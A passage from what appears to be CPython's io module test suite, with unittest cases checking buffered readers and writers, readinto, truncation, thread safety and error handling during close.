with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with warnings_helper.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(os_helper.TESTFN, 'w', encoding="utf-8", buffering=0)
def test_invalid_newline(self):
with warnings_helper.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(os_helper.TESTFN, 'w', encoding="utf-8", newline='invalid')
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
read1 = read
stream = Stream()
for method in ("readinto", "readinto1"):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b"12345")
def test_fspath_support(self):
def check_path_succeeds(path):
with self.open(path, "w", encoding="utf-8") as f:
f.write("egg\n")
with self.open(path, "r", encoding="utf-8") as f:
self.assertEqual(f.read(), "egg\n")
check_path_succeeds(FakePath(os_helper.TESTFN))
check_path_succeeds(FakePath(os.fsencode(os_helper.TESTFN)))
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as f:
bad_path = FakePath(f.fileno())
with self.assertRaises(TypeError):
self.open(bad_path, 'w', encoding="utf-8")
bad_path = FakePath(None)
with self.assertRaises(TypeError):
self.open(bad_path, 'w', encoding="utf-8")
bad_path = FakePath(FloatingPointError)
with self.assertRaises(FloatingPointError):
self.open(bad_path, 'w', encoding="utf-8")
# ensure that refcounting is correct with some error conditions
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(FakePath(os_helper.TESTFN), 'rwxa', encoding="utf-8")
def test_RawIOBase_readall(self):
# Exercise the default unlimited RawIOBase.read() and readall()
# implementations.
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.read(), b"abcdefg")
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.readall(), b"abcdefg")
def test_BufferedIOBase_readinto(self):
# Exercise the default BufferedIOBase.readinto() and readinto1()
# implementations (which call read() or read1() internally).
class Reader(self.BufferedIOBase):
def __init__(self, avail):
self.avail = avail
def read(self, size):
result = self.avail[:size]
self.avail = self.avail[size:]
return result
def read1(self, size):
"""Returns no more than 5 bytes at once"""
return self.read(min(size, 5))
tests = (
# (test method, total data available, read buffer size, expected
# read size)
("readinto", 10, 5, 5),
("readinto", 10, 6, 6), # More than read1() can return
("readinto", 5, 6, 5), # Buffer larger than total available
("readinto", 6, 7, 6),
("readinto", 10, 0, 0), # Empty buffer
("readinto1", 10, 5, 5), # Result limited to single read1() call
("readinto1", 10, 6, 5), # Buffer larger than read1() can return
("readinto1", 5, 6, 5), # Buffer larger than total available
("readinto1", 6, 7, 5),
("readinto1", 10, 0, 0), # Empty buffer
)
UNUSED_BYTE = 0x81
for test in tests:
with self.subTest(test):
method, avail, request, result = test
reader = Reader(bytes(range(avail)))
buffer = bytearray((UNUSED_BYTE,) * request)
method = getattr(reader, method)
self.assertEqual(method(buffer), result)
self.assertEqual(len(buffer), request)
self.assertSequenceEqual(buffer[:result], range(result))
unused = (UNUSED_BYTE,) * (request - result)
self.assertSequenceEqual(buffer[result:], unused)
self.assertEqual(len(reader.avail), avail - result)
def test_close_assert(self):
class R(self.IOBase):
def __setattr__(self, name, value):
pass
def flush(self):
raise OSError()
f = R()
# This would cause an assertion failure.
self.assertRaises(OSError, f.close)
# Silence destructor error
R.flush = lambda self: None
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.tp(rawio).xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = r"(%s\.)?%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertRegex(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertRegex(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertRegex(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
# Issue #25455
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b) # Should not crash
except RuntimeError:
pass
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
# Silence destructor error
raw.close = lambda: None
b.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
# Silence destructor error
b.flush = lambda: None
raw.close = lambda: None
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
def test_buffer_freeing(self) :
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"", bufio.read1(0))
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
def test_read1_arbitrary(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"bc", bufio.read1())
self.assertEqual(b"d", bufio.read1())
self.assertEqual(b"efg", bufio.read1(-1))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1())
self.assertEqual(rawio._reads, 4)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@support.requires_resource('cpu')
@threading_helper.requires_working_threading()
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(os_helper.TESTFN, "wb") as f:
f.write(s)
with self.open(os_helper.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with threading_helper.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
os_helper.unlink(os_helper.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
# Silence destructor error
bufio.close = lambda: None
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
def test_truncate_on_read_only(self):
rawio = self.MockFileIO(b"abc")
bufio = self.tp(rawio)
self.assertFalse(bufio.writable())
self.assertRaises(self.UnsupportedOperation, bufio.truncate)
self.assertRaises(self.UnsupportedOperation, bufio.truncate, 0)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
@skip_if_sanitizer(memory=True, address=True, reason= "sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading different, so that
# checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends into gc.garbage instead
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with warnings_helper.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(os_helper.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
def test_bad_readinto_value(self):
rawio = io.BufferedReader(io.BytesIO(b"12"))
rawio.readinto = lambda buf: -1
bufio = self.tp(rawio)
with self.assertRaises(OSError) as cm:
bufio.readline()
self.assertIsNone(cm.exception.__cause__)
def test_bad_readinto_type(self):
rawio = io.BufferedReader(io.BytesIO(b"12"))
rawio.readinto = lambda buf: b''
bufio = self.tp(rawio)
with self.assertRaises(OSError) as cm:
bufio.readline()
self.assertIsInstance(cm.exception.__cause__, TypeError)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with self.open(os_helper.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(os_helper.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
def test_truncate_after_write(self):
# Ensure that truncate preserves the file position after
# writes longer than the buffer size.
# Issue: https://bugs.python.org/issue32228
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with self.open(os_helper.TESTFN, "wb") as f:
# Fill with some buffer
f.write(b'\x00' * 10000)
buffer_sizes = [8192, 4096, 200]
for buffer_size in buffer_sizes:
with self.open(os_helper.TESTFN, "r+b", buffering=buffer_size) as f:
f.write(b'\x00' * (buffer_size + 1))
# After write write_pos and write_end are set to 0
f.read(1)
# read operation makes sure that pos != raw_pos
f.truncate()
self.assertEqual(f.tell(), buffer_size + 2)
@support.requires_resource('cpu')
@threading_helper.requires_working_threading()
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(os_helper.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with threading_helper.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(os_helper.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
os_helper.unlink(os_helper.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
# Silence destructor error
bufio.close = lambda: None
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
@threading_helper.requires_working_threading()
def test_slow_close_from_thread(self):
# Issue #31976
rawio = self.SlowFlushRawIO()
bufio = self.tp(rawio, 8)
t = threading.Thread(target=bufio.close)
t.start()
rawio.in_flush.wait()
self.assertRaises(ValueError, bufio.write, b'spam')
self.assertTrue(bufio.closed)
t.join()
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
